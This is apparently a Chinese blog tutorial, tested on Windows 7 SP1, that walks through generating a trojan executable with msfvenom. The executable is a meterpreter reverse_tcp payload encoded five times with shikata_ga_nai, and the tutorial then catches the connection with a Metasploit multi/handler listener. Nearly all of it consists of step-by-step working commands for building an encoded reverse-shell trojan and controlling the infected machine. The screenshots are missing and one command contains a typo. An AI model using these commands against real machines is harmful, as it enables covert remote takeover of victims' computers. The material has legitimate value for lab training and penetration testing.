利用msfvenom生成木马程序,在win7 sp1测试通过

  一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.
  二,工具:MSF
  三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
  四,过程:
  1,查看帮助
  命令: root# msfvenom -h
  结果:
  
  2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数
  命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o
  结果:
  
  3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口
  命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
  注:如果只是用msfpayload生成,简单示例:
  命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X > Desktop/abc.exe
  结果:
  
abc.exe
  说明: -p payload
  -e 编码方式
  -i 编码次数
  -b 在生成的程序中避免出现的值
  LHOST,LPORT 监听上线的主机IP和端口
  -f exe 生成EXE格式
  4,把生成的abc.exe放到win7下.执行.
  5,在命令行下,打开msfconsole.
  命令: root # msfconsole
  6,本机监听,因为之前用的是reverse_tcp,所以设置如下
  命令: msf > use exploit/multi/handler
  Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp
  结果:
  
msf-exploit.png
  7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来.
  
msfset.png
  8,.验证
  
sysinfo.png

你可能感兴趣的:(程序,木马)